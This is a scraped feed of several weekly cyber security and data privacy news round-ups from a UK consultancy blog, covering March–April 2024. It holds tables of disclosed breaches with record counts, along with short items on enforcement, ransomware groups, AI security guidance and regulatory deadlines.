Source
(New)
ManufacturingVietnamYesUnknown
Grand Base
Source
(New)
BlockchainUnknownYesUnknown
Barnetts Couriers
Source
(New)
TransportAustraliaUnknownUnknown
Hôpital de Cannes – Simone Veil
Source
(New)
HealthcareFranceUnknownUnknown
SYNLAB Italia
Source
(New)
ResearchItalyUnknownUnknown
OGERO
Source
(New)
TelecomsLebanonUnknownUnknown
1+1 media
Source
(New)
MediaUkraineUnknownUnknown
MITRE
Source
(New)
Cyber securityUSAUnknownUnknown
Octapharma Plasma, Inc.
Source
(New)
ManufacturingUSAUnknownUnknown
Systems used by New York’s legislature
Source
(New)
PublicUSAUnknownUnknown
OLA (Observatorio de Libertad Académica)
Source
(New)
Non-profitCubaNo0
Likud Party
Source
(New)
PublicIsraelNo0
LRT
Source
(New)
MediaLithuaniaNo0
Carpetright
Source
(New)
RetailUKNo0
Gmail And YouTube users
Source
(New)
IT servicesUSANo0

Note 1: ‘New’/‘Update’ in the first column refers to whether this breach was first publicly disclosed this week, or whether a significant update was released this week. The updated data point is italicised in the table.

Note 2: For incidents where we only know the file size of the data breached, we use the formula 1 MB = 1 record. Given that we can’t know the exact numbers, as it depends on the types of records included (e.g. pictures and medical histories are considerably larger files than just names and addresses), we err on the side of caution by using this formula. We believe that this underestimates the records breached in most cases, but it is more accurate than not providing a number at all. To learn more about our research methodology, click here.


AI

NSA published guidance on strengthening the security of AI systems

The US National Security Agency has published a cyber security information sheet entitled Deploying AI Systems Securely: Best Practices for Deploying Secure and Resilient AI Systems. The guidance was designed for national security purposes, but can be applied by anyone bringing AI capabilities into a managed environment.

Protect AI releases April 2024 vulnerability report

Protect AI has published its latest monthly report into security vulnerabilities affecting AI systems. This month contains 48 vulnerabilities, up 220% from the 15 it identified in November 2023.

Enforcement

Proposed FTC order will fine Cerebral, Inc. $7 million and restrict its use of sensitive data

Cerebral, Inc. has agreed to an FTC order that will prohibit it from using or disclosing sensitive consumer data for advertising purposes. Under the proposed order, the company will be required to pay more than $7 million for violating its customers’ privacy rights.

International law enforcement operation disrupts LabHost phishing-as-a-service platform

A law enforcement operation involving 19 countries has disrupted LabHost, one of the world’s largest phishing-as-a-service platforms. 37 suspects have been arrested and the LabHost platform has been shut down.


Other news

ENISA will not create vulnerability database

Hans de Vries, the new chief cybersecurity and operational officer of ENISA, the EU Agency for Cybersecurity, has confirmed that his agency will not create a database of security vulnerabilities, as proposed by the EU Cyber Resilience Act.

NCSC CAF (Cyber Assessment Framework) 3.2 published

The National Cyber Security Centre has published version 3.2 of its Cyber Assessment Framework. Significant changes have been made to sections covering remote access, privileged operations, user access levels and the use of multifactor authentication.

CREST launches new cyber threat intelligence guide

CREST has published a new guide: What is Cyber Threat Intelligence and How is it Used? It provides accessible advice on the theory and practice of CTI products and services, outlining key concepts and principles underpinning CTI, along with the ways organisations can use CTI to predict, prevent, detect and respond to potential cyber security threats and reduce cyber risk.

NATO to launch new cyber centre

Acknowledging that “cyberspace is contested at all times”, NATO will create a new cyber centre at its military headquarters in Mons, Belgium. James Appathurai, NATO’s deputy assistant secretary general for innovation, hybrid and cyber, said the new centre would be modelled on the UK’s NCSC.

HHS patches security after cyber attack

Following a cyber attack on the US Department of Health and Human Services last year, in which criminals stole $7.5 million, the Department is removing HHS Login from its grantee payment system.

EDPB sets out priorities for 2024–2027

The EDPB (European Data Protection Board) has adopted its strategy for 2024–2027, which is based around four pillars:

  1. Enhancing harmonisation and promoting compliance.
  2. Reinforcing a common enforcement culture and effective cooperation.
  3. Safeguarding data protection in the developing digital and cross-regulatory landscape.
  4. Contributing to the global dialogue on data protection.

The Board’s chair, Anu Talus, said: “The new strategy takes the existing vision in a new direction in order to respond to the data protection needs of today, and the ever evolving digital landscape. The strategy is the result of a collaborative effort, involving all EU data protection authorities (DPAs) and sets out common priorities for the years to come.”

EDPB publishes opinion on Meta’s ‘pay or OK’ model

The EDPB has published its opinion on Meta’s proposed ‘pay or consent’ model, which aims to charge users a monthly fee to use its platforms without targeted advertising. Louise Brooks, from IT Governance’s sister company DQM GRC, observes:

“The opinion finds that Meta’s proposed ‘pay or consent’ model isn’t compliant with the EU GDPR, but it doesn’t go so far as to rule it out as an option completely. It’s important at this stage to understand that EDPB opinions are not legally binding.

“However, the opinion was requested by supervisory authorities for the purpose of active cases under consideration for enforcement action, so the outcome of those cases will add context and detail to the interpretation of, and potential future reliance upon, the opinion.

“From a UK perspective, we know the ICO is actively monitoring the European debate on this issue as it confirmed the same at the DMA’s recent annual conference, so it remains to be seen how the EDPB’s opinion might be used or interpreted here.

“The debate certainly isn’t over, and we probably need to wait for case law to proceed before we can really start seeing the wood for the trees and understand the ramifications.

“Nevertheless, any sensible large online platforms would do well to model alternatives and consider the impact any precedents set by enforcement actions that don’t support their business models might have.”

ICO publishes guidance to improve transparency in health and social care

The ICO (Information Commissioner’s Office) has published new guidance to provide regulatory certainty on how health and social care organisations should handle sensitive information while keeping people properly informed.


Recently published reports


Key dates

29 April 2024 – UK Product Security and Telecommunications Infrastructure Act 2022 comes into effect

The UK’s consumer connectable product security regime comes into effect on 29 April 2024. Businesses in the supply chains of these products need to be compliant with the legislation from that date.

30 April 2024 – ISO/IEC 27001:2013 certification unavailable

Certification bodies must stop offering (re)certification to ISO 27001:2013 by 30 April. The new iteration of the Standard, ISO 27001:2022, isn’t significantly different from ISO 27001:2013, but there are some notable changes. Learn more about complying with ISO 27001:2022.


That’s it for this week’s round-up. We hope you found it useful.

We’ll be back next week with the biggest and most interesting news stories, all rounded up in one place.

In the meantime, if you missed it, check out last week’s round-up. Alternatively, you can view our full archive.


Security Spotlight

To get news of the latest data breaches and cyber attacks straight to your inbox, subscribe to our weekly newsletter: the Security Spotlight.

Every Wednesday, you’ll get a 4-minute email with:

  • Industry news, including this weekly round-up;
  • Our latest research and statistics;
  • Interviews with our experts, sharing their insights and expertise;
  • Free useful resources; and
  • Upcoming webinars.

The post The Week in Cyber Security and Data Privacy: 15 – 21 April 2024 appeared first on IT Governance UK Blog.

]]>
The Week in Cyber Security and Data Privacy: 8 – 14 April 2024 https://www.itgovernance.co.uk/blog/the-week-in-cyber-security-and-data-privacy-8-14-april-2024 Mon, 15 Apr 2024 16:48:13 +0000 https://www.itgovernance.co.uk/blog/?p=46274 7,531,492 known records breached in 124 newly disclosed incidents Welcome to this week’s global round-up of the biggest and most interesting news stories. At the end of each month, these incidents – and any others that we find – will be used to inform our monthly analysis of data breaches and cyber attacks. Update on last week’s story about the alleged US EPA (Environmental Protection Agency) breach: it appears the data was already publicly available. We’ve therefore removed this entry from our incident log. Publicly disclosed data breaches and cyber attacks: in the spotlight AT&T confirms more than 50 million

The post The Week in Cyber Security and Data Privacy: 8 – 14 April 2024 appeared first on IT Governance UK Blog.

]]>
7,531,492 known records breached in 124 newly disclosed incidents

Welcome to this week’s global round-up of the biggest and most interesting news stories.

At the end of each month, these incidents – and any others that we find – will be used to inform our monthly analysis of data breaches and cyber attacks.


Update on last week’s story about the alleged US EPA (Environmental Protection Agency) breach: it appears the data was already publicly available. We’ve therefore removed this entry from our incident log.


Publicly disclosed data breaches and cyber attacks: in the spotlight

AT&T confirms more than 50 million customers affected by March data breach

On 17 March, a threat actor known as Major Nelson listed more than 70 million data records on a dark web forum, claiming it to be data originally exfiltrated from AT&T by a threat actor known as ShinyHunters in 2021. AT&T said the data did not come from its systems.

Now, the company has confirmed that more than 50 million people’s data was in fact included in the 17 March data leak. Compromised data included full names, email addresses, postal addresses, phone numbers, Social Security numbers, dates of birth, AT&T account numbers and AT&T passcodes. According to AT&T’s investigation, the data appears to be from June 2019 or earlier.

Data breached: 51,226,382 people’s data.

Giant Tiger confirms data breach via third party

The Canadian retail chain Giant Tiger has reported that one of its vendors has suffered a cyber attack, affecting nearly 3 million Giant Tiger customer data records. Compromised data included customers’ names, postal addresses, email addresses, phone numbers and purchase data, all of which was leaked online.

The data breach notification website Have I Been Pwned added the data to its database on 12 April, confirming that 46% of the records were already in its database.

Data breached: 2,842,669 records.

Cyber attack causes Traverse City Area Public Schools to cancel classes

TCAPS (Traverse City Area Public Schools) in Michigan cancelled classes on 1 and 2 April because of what it described as “network disruption that impacted the functionality and access of certain systems”.

On 14 April, a threat actor known as Medusa claimed to have stolen 1.2 TB of data from TCAPS, demanding a ransom of $500,000.

Data breached: 1.2 TB.


Publicly disclosed data breaches and cyber attacks: full list

This week, we found 7,531,492 records known to be compromised, and 124 organisations suffering a newly disclosed incident. 105 of them are known to have had data exfiltrated, exposed or otherwise breached. Only 3 definitely haven’t had data breached.

We also found 24 organisations providing a significant update on a previously disclosed incident.

Organisation(s)SectorLocationData breached?Known data breached
AT&T Inc.
Source 1; source 2
(Update)
TelecomsUSAYes51,226,382
boAt Lifestyle
Source 1; source 2
(Update)
ManufacturingIndiaYes7,528,986
Giant Tiger
Source 1; source 2; source 3
(Update)
RetailCanadaYes2,842,669
Traverse City Area Public Schools
Source 1; source 2
(Update)
EducationUSAYes1.2 TB
Unknown (attributed to Accor)
Source 1; source 2
(New)
HospitalityFranceYes642,000
Inszone Insurance Services
Source
(New)
InsuranceUSAYes615,672
Roku
Source
(New)
SoftwareUSAYes576,000
Group Health Cooperative of South Central Wisconsin
Source
(New)
HealthcareUSAYes533,809
Houser LLP
Source 1; source 2
(Update)
LegalUSAYes370,001
iCabbi
Source; source 2
(New)
SoftwareUKYes287,000
DISB (District of Columbia Department of Insurance, Securities and Banking)
Source 1
(New)
PublicUSAYes“few hundred” GBs
CURVA
Source 1; source 2
(New)
RetailEgyptYes105,000
Pregnant women in El Salvador
Source
(New)
HealthcareEl SalvadorYes96,191
Paducah Dermatology
Source
(New)
HealthcareUSAYes80,161
Nexperia
Source
(New)
ManufacturingNetherlandsYes74 GB
Gaia Software
Source 1; source 2
(New)
SoftwareUSAYes56,676
forum.kasperskyclub.ru
Source 1; source 2
(Update)
IT servicesRussiaYes55,971
Bradford-Scott Data, Massachusetts Family Credit Union, Methuen Federal Credit Union, Priority Plus Federal Credit Union, StagePoint Federal Credit Union,  Wellness Federal Credit Union, Community Credit Union of New Milford and The Andovers Federal Credit Union
Source 1; source 2
(Update)
Software and financeUSAYes43,435
SMC and Carrier Global
Source
(New)
SoftwareNetherlandsYes>26,000
St. Lucie County Tax Collector’s Office
Source 1; source 2
(Update)
PublicUSAYes25,202
Canopy Children’s Solutions
Source
(New)
Non-profitUSAYes19,190
Cattaraugus-Allegany BOCES
Source 1; source 2
(New)
EducationUSAYes15,203
SinglePoint Outsourcing, Inc.
Source 1; source 2
(Update)
Professional servicesUSAYes11,096
Trustpoint Rehabilitation Hospital of Lubbock
Source 1; source 2; source 3
(Update)
HealthcareUSAYes9,014
Mountain Valley Regional Rehabilitation Hospital
Source 1; source 2; source 3
(Update)
HealthcareUSAYes5,963
Greenwood Regional Rehabilitation Hospital
Source 1; source 2; source 3
(Update)
HealthcareUSAYes5,823
Northern Idaho Advanced Care Hospital
Source 1; source 2
(New)
HealthcareUSAYes5,606
Rehabilitation Hospital of Southern New Mexico
Source 1; source 2; source 3
(Update)
HealthcareUSAYes5,466
New Braunfels Regional Rehabilitation Hospital
Source 1; source 2
(New)
HealthcareUSAYes5,384
Highmark Inc.
Source 1; source 2
(New)
InsuranceUSAYes5,356
Spartanburg Rehabilitation Institute
Source 1; source 2; source 3
(Update)
HealthcareUSAYes4,506
MolenTax
Source
(New)
FinanceUSAYes4,323
PRATT MRI LLC
Source 1; source 2
(New)
HealthcareUSAYes4,265
South Texas Rehabilitation Hospital
Source 1; source 2
(New)
HealthcareUSAYes4,130
Epilepsy Foundation of Metro New York
Source
(New)
HealthcareUSAYes3,852
Rehabilitation Hospital of the Northwest
Source 1; source 2; source 3
(Update)
HealthcareUSAYes3,821
Rehabilitation Hospital of Northwest Ohio
Source 1; source 2
(New)
HealthcareUSAYes3,671
Elkhorn Valley Rehabilitation Hospital
Source 1; source 2
(New)
HealthcareUSAYes3,636
Corpus Christi Rehabilitation Hospital
Source 1; source 2
(New)
HealthcareUSAYes3,581
Northern Utah Rehabilitation Hospital
Source 1; source 2; source 3
(Update)
HealthcareUSAYes3,477
Mesquite Rehabilitation Institute
Source 1; source 2
(New)
HealthcareUSAYes3,317
Rehabilitation Hospital of Northern Arizona
Source 1; source 2
(New)
HealthcareUSAYes3,287
Summa Rehabilitation Hospital
Source 1; source 2
(New)
HealthcareUSAYes2,986
Lafayette Regional Rehabilitation Hospital
Source 1; source 2; source 3
(Update)
HealthcareUSAYes2,861
Weslaco Regional Rehabilitation Hospital
Source 1; source 2
(New)
HealthcareUSAYes2,781
Lakewood Medical Center
Source 1; source 2
(New)
HealthcareUSAYes2,500
Builders Equipment & Tool Company
Source 1; source 2
(New)
ConstructionUSAYes2,463
Advanced Care Hospital of Montana
Source 1; source 2
(New)
HealthcareUSAYes2,331
Delphinus Engineering, Inc.
Source 1; source 2
(Update)
EngineeringUSAYes2,232
The Goddard School
Source
(New)
EducationUSAYes2,041
Midlands Regional Rehabilitation Hospital
Source 1; source 2; source 3
(Update)
HealthcareUSAYes2,018
EBlock
Source
(New)
SoftwareUSAYes1,997
UT Southwestern Medical Center
Source 1; source 2
(New)
HealthcareUSAYes1,956
Butler University and Athletic Trainer System
Source
(New)
Education and softwareUSAYes1,871
Laredo Rehabilitation Hospital
Source 1; source 2
(New)
HealthcareUSAYes1,785
Oceaneering
Source
(New)
EngineeringUSAYes1,776
Rehabilitation Hospital of Northern Indiana
Source 1; source 2
(New)
HealthcareUSAYes1,643
Utah Valley Rehabilitation Hospital
Source 1; source 2
(New)
HealthcareUSAYes1,642
Baytown Medical Center, Inc.
Source 1; source 2
(New)
HealthcareUSAYes1,500
Continuum Health Alliance, LLC
Source 1; source 2
(New)
HealthcareUSAYes1,328
Autoritatea Electorală Permanentă
Source
(New)
PublicRomaniaYes1,300
Mesquite Specialty Hospital
Source 1; source 2
(New)
HealthcareUSAYes1,244
Laredo Specialty Hospital
Source 1; source 2
(New)
HealthcareUSAYes1,242
Bloomington Regional Rehabilitation Hospital
Source 1; source 2
(New)
HealthcareUSAYes1,191
Advanced Care Hospital of Southern New Mexico
Source 1; source 2; source 3
(Update)
HealthcareUSAYes1,162
Florida Pediatric Associates
Source 1; source 2
(New)
HealthcareUSAYes1,104
Frank Olean Center
Source
(New)
Non-profitUSAYes1,050
Rehabilitation Hospital of Southern California
Source 1; source 2; source 3
(Update)
HealthcareUSAYes925
Randolph Health
Source
(New)
HealthcareUSAYes899
Northern Colorado Rehabilitation Hospital
Source 1; source 2; source 3
(Update)
HealthcareUSAYes885
Bakersfield Rehabilitation Hospital
Source 1; source 2
(New)
HealthcareUSAYes852
Denver Regional Rehabilitation Hospital
Source 1; source 2; source 3
(Update)
HealthcareUSAYes848
Zuckerberg San Francisco General Hospital and Trauma Center
Source 1; source 2
(New)
HealthcareUSAYes755
Rutgers Robert Wood Johnson Medical School
Source 1; source 2
(New)
EducationUSAYes543
Strive Holdco, LLC
Source 1; source 2
(New)
HealthcareUSAYes501
Sleep Management Institute
Source 1; source 2
(New)
HealthcareUSAYes500
TransAxle LLC
Source
(New)
TransportUSAYes401
Brown, Paindiris & Scott, LLP
Source
(New)
LegalUSAYes235
Bristol Bay Construction Holdings LLC
Source
(New)
ConstructionUSAYes27
CVS
Source
(New)
Non-profitUSAYes10
Wells Fargo
Source 1; source 2
(New)
FinanceUSAYes2
Telecom Argentina
Source
(New)
TelecomsArgentinaYesUnknown
Suncorp Bank
Source
(New)
FinanceAustraliaYesUnknown
MotorCycle Holdings Limited
Source
(New)
ManufacturingAustraliaYesUnknown
Ecotech Print Solutions
Source
(New)
Professional servicesAustraliaYesUnknown
Herron Todd White
Source
(New)
Real estateAustraliaYesUnknown
BHF Couriers Express
Source
(New)
TransportAustraliaYesUnknown
Yoga4Yogi
Source
(New)
Professional servicesCzech RepublicYesUnknown
Académie de Lyon and Ministère de l’Éducation nationale et de la Jeunesse
Source
(New)
Education and publicFranceYesUnknown
Le Slip Français
Source
(New)
RetailFranceYesUnknown
Karnataka Skill Development Corporation
Source
(New)
PublicIndiaYesUnknown
LeadSquared and WeRize
Source
(New)
SoftwareIndiaYesUnknown
Alsaree3 Group Ltd.
Source
(New)
HospitalityIraqYesUnknown
Israeli Ministry of Defense
Source
(New)
PublicIsraelYesUnknown
Multiplayer.it
Source
(New)
IT servicesItalyYesUnknown
Maccarinelli Autonegozi
Source
(New)
RetailItalyYesUnknown
INVEX
Source
(New)
FinanceMexicoYesUnknown
Orderchamp
Source
(New)
IT servicesNetherlandsYesUnknown
Universidad Inca Garcilaso de la Vega
Source
(New)
EducationPeruYesUnknown
Tkachev Agricultural Complex
Source
(New)
AgriculturalRussiaYesUnknown
OwenCloud.ru
Source
(New)
SoftwareRussiaYesUnknown
Moskollektor
Source
(New)
UtilitiesRussiaYesUnknown
University of Colombo
Source
(New)
EducationSri LankaYesUnknown
NRS Healthcare
Source
(New)
HealthcareUKYesUnknown
THSP
Source
(New)
PublicUKYesUnknown
CVS Group Plc
Source
(New)
VeterinaryUKYesUnknown
East Central University
Source
(New)
EducationUSAYesUnknown
The University of Alabama
Source
(New)
EducationUSAYesUnknown
Community Alliance
Source
(New)
HealthcareUSAYesUnknown
Hapy Bear Surgery Center
Source 1; source 2
(New)
HealthcareUSAYesUnknown
Kenneth Young Center
Source
(New)
HealthcareUSAYesUnknown
WebTPA
Source
(New)
InsuranceUSAYesUnknown
Henningson & Snoxell, Ltd.
Source
(New)
LegalUSAYesUnknown
Thunderbird Country Club
Source
(New)
LeisureUSAYesUnknown
Winterfest Boat Parade
Source
(New)
LeisureUSAYesUnknown
OraSure Technologies
Source
(New)
ManufacturingUSAYesUnknown
Rawlings Sporting Goods
Source
(New)
ManufacturingUSAYesUnknown
Targus
Source
(New)
ManufacturingUSAYesUnknown
Tandym Group
Source 1; source 2
(New)
Professional servicesUSAYesUnknown
Hernando County Government
Source 1; source 2
(Update)
PublicUSAYesUnknown
The Bernstein Companies
Source 1; source 2
(New)
Real estateUSAYesUnknown
PME Babbitt Bearings
Source
(New)
RetailUSAYesUnknown
Microsoft
Source
(New)
SoftwareUSAYesUnknown
Sisense
Source
(New)
SoftwareUSAYesUnknown
Alan Ritchey, Inc.
Source 1; source 2
(New)
TransportUSAYesUnknown
LG Electronics
Source
(New)
ManufacturingSouth KoreaUnknownUnknown
Paris Saint-Germain
Source
(New)
LeisureFranceUnknownUnknown
Saint-Nazaire et agglomeration
Source
(New)
PublicFranceUnknownUnknown
GBI-Genios Deutsche Wirtschaftsdatenbank GmbH
Source
(New)
MediaGermanyUnknownUnknown
Tel Aviv power outage
Source
(New)
PublicIsraelUnknownUnknown
German Jordanian University
Source
(New)
EducationJordanUnknownUnknown
King Abdullah II
Source
(New)
PublicJordanUnknownUnknown
Queen Alia International Airport
Source
(New)
TransportJordanUnknownUnknown
Emeequis
Source
(New)
MediaMexicoUnknownUnknown
Eblal Healthcare
Source
(New)
HealthcareSaudi ArabiaUnknownUnknown
Casa Árabe
Source
(New)
PublicSpainUnknownUnknown
Robertson Cheatham Co-Op
Source
(New)
AgriculturalUSAUnknownUnknown
New Mexico Highlands University and other New Mexico institutions
Source 1; source 2
(New)
EducationUSAUnknownUnknown
Swinomish Casino & Lodge
Source
(New)
LeisureUSAUnknownUnknown
The Heritage Foundation
Source
(New)
Non-profitUSAUnknownUnknown
Dirección General de Contrataciones Públicas
Source
(New)
PublicDominican RepublicNo0
Belvedere Vodka UK
Source
(New)
ManufacturingUKNo0
TUC (Trades Union Congress)
Source
(New)
Non-profitUKNo0

Note 1: ‘New’/‘Update’ in the first column refers to whether this breach was first publicly disclosed this week, or whether a significant update was released this week. The updated data point is italicised in the table.

Note 2: For incidents where we only know the file size of the data breached, we use the formula 1 MB = 1 record. Given that we can’t know the exact numbers, as it depends on the types of records included (e.g. pictures and medical histories are considerably larger files than just names and addresses), we err on the side of caution by using this formula. We believe that this underestimates the records breached in most cases, but it is more accurate than not providing a number at all. To learn more about our research methodology, click here.


AI

AI-written PowerShell script used in malicious email campaigns

Bleeping Computer reports that a threat actor is using a PowerShell script “likely” created with ChatGPT or a similar AI model to spread the Rhadamanthys information stealer via email. The security company Proofpoint attributed the attack to a threat actor tracked as TA547, also known as Scully Spider.

ICO seeks views on generative AI models’ accuracy         

The ICO (Information Commissioner’s Office) has launched a consultation on how data protection law applies to generative AI, particularly in relation to its accuracy. The Information Commissioner, John Edwards, commented: “In a world where misinformation is growing, we cannot allow misuse of generative AI to erode trust in the truth. Organisations developing and deploying generative AI must comply with data protection law – including our expectations on accuracy of personal information.” The consultation is open until 5 pm on 10 May 2024.


Enforcement

European Parliament votes to enhance EU GDPR enforcement

MEPs have voted in favour of amendments to the EU GDPR (General Data Protection Regulation) that strengthen the Regulation’s enforcement. The amendments change the role of the supervisory authorities and remove some of their obligations to share the findings of their investigations.

Police investigating LockBit ransomware gang seek 200 suspected criminals

Police have matched some 200 LockBit affiliates’ pseudonyms to their real identities. A police spokesperson, who asked to remain anonymous, told Bloomberg that they “now have a clear idea of LockBit’s hierarchy and its most influential members, who they plan to pursue”.


Other news

Hunters International demands $10 million ransom from Hoya Corporation

Last week, we listed a security incident affecting several of Hoya Corporation’s divisions. It now transpires that the cyber attack was carried out by the Hunters International ransomware group, which has demanded a $10 million ransom from the Japanese optical instrument manufacturer. Hunters claims to have stolen 2 TB of data from the company, which it is threatening to release if its demands are not met.

NIST releases online courses for SP 800-53, SP 800-53A and SP 800-53B

NIST (National Institute of Standards and Technology) has released self-guided online courses on three of its standards: SP (Special Publication) 800-53, SP 800-53A and SP 800-53B.

All three courses are introductory, offering a “high-level overview of foundational security and privacy risk management concepts” based on these standards.

91,000 LG smart TVs vulnerable to attack

Bitdefender has discovered four security vulnerabilities affecting multiple versions of LG Electronics WebOS – the operating system used in its smart TVs. According to Bleeping Computer, the vulnerabilities “enable varying degrees of unauthorized access and control over affected models, including authorization bypasses, privilege escalation, and command injection”.

USDoD attempting to sell 2.9 billion data records from UK, US and Canada

A threat actor known as USDoD has listed a 4 TB database apparently containing 2.9 billion rows of data on a dark web forum. Given the scale of the database, we await verification before adding it to our listings.


Recently published reports


Key date

30 April 2024 – ISO/IEC 27001:2013 certification unavailable

Certification bodies must stop offering (re)certification to ISO 27001:2013 by 30 April. The new iteration of the Standard, ISO 27001:2022, isn’t significantly different from ISO 27001:2013, but there are some notable changes. Learn more about complying with ISO 27001:2022.


That’s it for this week’s round-up. We hope you found it useful.

We’ll be back next week with the biggest and most interesting news stories, all rounded up in one place.

In the meantime, if you missed it, check out last week’s round-up. Alternatively, you can view our full archive.


Security Spotlight

To get news of the latest data breaches and cyber attacks straight to your inbox, subscribe to our weekly newsletter: the Security Spotlight.

Every Wednesday, you’ll get a 4-minute email with:

  • Industry news, including this weekly round-up;
  • Our latest research and statistics;
  • Interviews with our experts, sharing their insights and expertise;
  • Free useful resources; and
  • Upcoming webinars.

The post The Week in Cyber Security and Data Privacy: 8 – 14 April 2024 appeared first on IT Governance UK Blog.

]]>
The Week in Cyber Security and Data Privacy: 18 – 24 March 2024 https://www.itgovernance.co.uk/blog/the-week-in-cyber-security-and-data-privacy-18-24-march-2024 Mon, 25 Mar 2024 19:14:12 +0000 https://www.itgovernance.co.uk/blog/?p=46201 134,503,937 known records breached in 1,091 newly disclosed incidents Welcome to this week’s global round-up of the biggest and most interesting news stories. At the end of each month, these incidents – and any others that we find – will be used to inform our monthly analysis of data breaches and cyber attacks. Publicly disclosed data breaches and cyber attacks: in the spotlight Misconfigured Google Firebase instances expose almost 125 million user records On 10 January, a security researcher known as ‘MrBruh’ reported on vulnerabilities in the AI hiring system Chattr.ai, which is used by many US fast food chains.

The post The Week in Cyber Security and Data Privacy: 18 – 24 March 2024 appeared first on IT Governance UK Blog.

]]>
134,503,937 known records breached in 1,091 newly disclosed incidents

Welcome to this week’s global round-up of the biggest and most interesting news stories.

At the end of each month, these incidents – and any others that we find – will be used to inform our monthly analysis of data breaches and cyber attacks.


Publicly disclosed data breaches and cyber attacks: in the spotlight

Misconfigured Google Firebase instances expose almost 125 million user records

On 10 January, a security researcher known as ‘MrBruh’ reported on vulnerabilities in the AI hiring system Chattr.ai, which is used by many US fast food chains.

According to MrBruh, attackers could register profiles with full privileges by exploiting misconfigurations in Google Firebase – a Cloud-based mobile application platform.

This gave them access to names, phone numbers, emails, plaintext passwords, branch locations, confidential messages and shift information for Chattr employees, franchisee managers and job applicants.

MrBruh, alongside two other researchers who go by the names ‘Logykk’ and ‘xyzeva’/’Eva’, then scanned more than 5 million domains for personally identifiable information exposed via other misconfigured Firebase instances.

They discovered 916 misconfigured websites, exposing 124,605,664 million users’ records, including names, emails, phone numbers, passwords and financial data.

The researchers then alerted all affected organisations, sending 842 emails over 13 days. Only 24% of site owners fixed the misconfiguration.

Data breached: 124,605,664 records.

Multiple Indian brands affected by Gamooga misconfiguration

A misconfigured Apache Kafka broker belonging to the Indian marketing analytics company Gamooga exposed sensitive data relating to numerous organisations in India for over a year, “including banking service providers, insurance agencies, e-commerce stores, entertainment apps, and educational institutions”.

At least 1 million customers of well-known brands, including Swiggy, Redbus, Nykaa, BigBasket, TataMotors, ICICIPruLife and Axis Direct, are known to be affected, but the actual scale of the breach is potentially vast: Gamooga claims to track more than 1 billion users – two thirds of India’s population, or one eighth of the world’s.

Publicly accessible information included names, dates of birth, phone numbers, email addresses, IP addresses, purchase history, insurance information, payment information, and more.

Data breached: at least 1 million people’s data.

Chinese APT group compromises 70 organisations, including 48 government agencies

The Chinese advanced persistent threat group Earth Krahang is known to have targeted at least 116 organisations in 45 countries, and has successfully breached 70 organisations in 23 countries. These include 48 government agencies, 10 of which are foreign affairs ministries.

According to Trend Micro, which has been tracking the group since early 2022, the group “exploits public-facing servers and sends spear phishing emails to deliver previously unseen backdoors”.

It then uses “its malicious access to government infrastructure to attack other government entities, abusing the infrastructure to host malicious payloads, proxy attack traffic, and send spear-phishing emails to government-related targets using compromised government email accounts”.

Data breached: unknown.


Publicly disclosed data breaches and cyber attacks: full list

This week, we found 134,503,937 records known to be compromised, and 1,091 organisations suffering a newly disclosed incident. 916 of those incidents are linked to Google Firebase misconfigurations, as explained above.

This week, 1,076 organisations are known to have had data exfiltrated, exposed or otherwise breached. Only 5 definitely haven’t had data breached.

We also found 6 organisations providing a significant update on a previously disclosed incident.

Organisation(s)SectorLocationData breached?Known data breached
916 Google Firebase websites (via Chattr)
Source 1; source 2; source 3
(New)
Retail and hospitalityUSAYes124,605,664
eClinical Solutions
Source
(New)
SoftwareUSAYes3 TB
Kelson
Source
(New)
ConstructionCanadaYes1.5 TB
Gamooga, Swiggy, bigbasket.com, redBus, Nykaa, CaratLane, TataMotors, ICICI Prudential Life Insurance Company Limited and Axis Bank
Source
(New)
IT services, retail, manufacturing, insurance and financeIndiaYes>1,000,000
International Luxury Group
Source
(New)
RetailSwitzerlandYes1 TB
Grupa Topex
Source
(New)
ManufacturingPolandYes638 GB
Philips Respironics
Source 1; source 2; source 3; source 4
(New)
ManufacturingUSAYes457,152
NewAgeSys, Inc
Source
(New)
Professional servicesUSAYes319 GB
V12Software
Source 1; source 2
(New)
SoftwareUSAYes286,396
Sting AD
Source
(New)
ManufacturingBulgariaYes235,585
Therapeutic Health Services
Source
(New)
HealthcareUSAYes218,940
Sun Holdings
Source
(New)
HospitalityUSAYes182,756
3Delectronics
Source
(New)
RetailRussiaYes133,000
University of Wisconsin Hospitals and Clinics
Source 1; source 2
(New)
HealthcareUSAYes85,902
South China Athletic Association
Source 1; source 2
(New)
Non-profitHong KongYes70,000
Select Education Group
Source
(New)
Professional servicesUSAYes67,097
PyLC
Source
(New)
InsuranceMexicoYes63,000
El Ezaby Pharmacy
Source 1; source 2
(New)
ManufacturingEgyptYes62.4 GB
Hallesche Kraftverkehrs-& Speditions-GmbH
Source
(New)
TransportGermanyYes54,547
Valley Oaks Health
Source
(New)
HealthcareUSAYes50,352
City of Jacksonville Beach
Source
(New)
PublicUSAYes48,949
Kirkland & Ellis
Source 1; source 2
(New)
LegalUSAYes48,802
Monmouth College
Source 1; source 2
(New)
EducationUSAYes44,737
England & Wales Cricket Board (ECB)
Source
(New)
LeisureUKYes43,000
GardaWorld
Source
(New)
Professional servicesUSAYes39,928
Citizens Bank of West Virginia
Source 1; source 2
(Update)
FinanceUSAYes35,105
Podemos
Source
(New)
PublicSpainYes30 GB
Fidelity Investments Life Insurance
Source 1; source 2
(Update)
InsuranceUSAYes29,073
Bethel School District
Source
(New)
EducationUSAYes28,844
Weirton Medical Center
Source
(New)
HealthcareUSAYes26,793
American Renal Associates
Source
(New)
HealthcareUSAYesAt least 19,295
Tiegerman
Source 1; source 2
(New)
EducationUSAYes19,000
R1 RCM
Source 1; source 2; source 3
(Update)
SoftwareUSAYes16,121
Newton Public Schools
Source
(New)
EducationUSAYes10,545
Healthfirst
Source 1; source 2
(New)
InsuranceUSAYes6,836
Johnson Matthey
Source
(New)
ManufacturingUSAYes6,095
St. Mary’s Healthcare System for Children
Source
(New)
HealthcareUSAYes5,650
Simpson Strong-Tie
Source
(New)
RetailUSAYes5,570
Victory Bank
Source 1; source 2
(New)
FinanceUSAYes4,292
Dental Group of Amarillo
Source 1; source 2
(New)
HealthcareUSAYes3,821
Eastside Union School District
Source
(New)
EducationUSAYes3,592
Schuster Co
Source
(New)
TransportUSAYes3,532
Dedicated Senior Medical Centers
Source 1; source 2
(New)
HealthcareUSAYes3,441
Sycamore Rehabilitation Services, Inc.
Source
(New)
HealthcareUSAYes3,414
A5 Pharmacy Inc.
Source 1; source 2
(New)
HealthcareUSAYes3,000
Plymouth Tube Company Employee Benefit Plan
Source 1; source 2; source 3
(Update)
InsuranceUSAYes2,652
Shimon Peres Negev Nuclear Research Center
Source
(New)
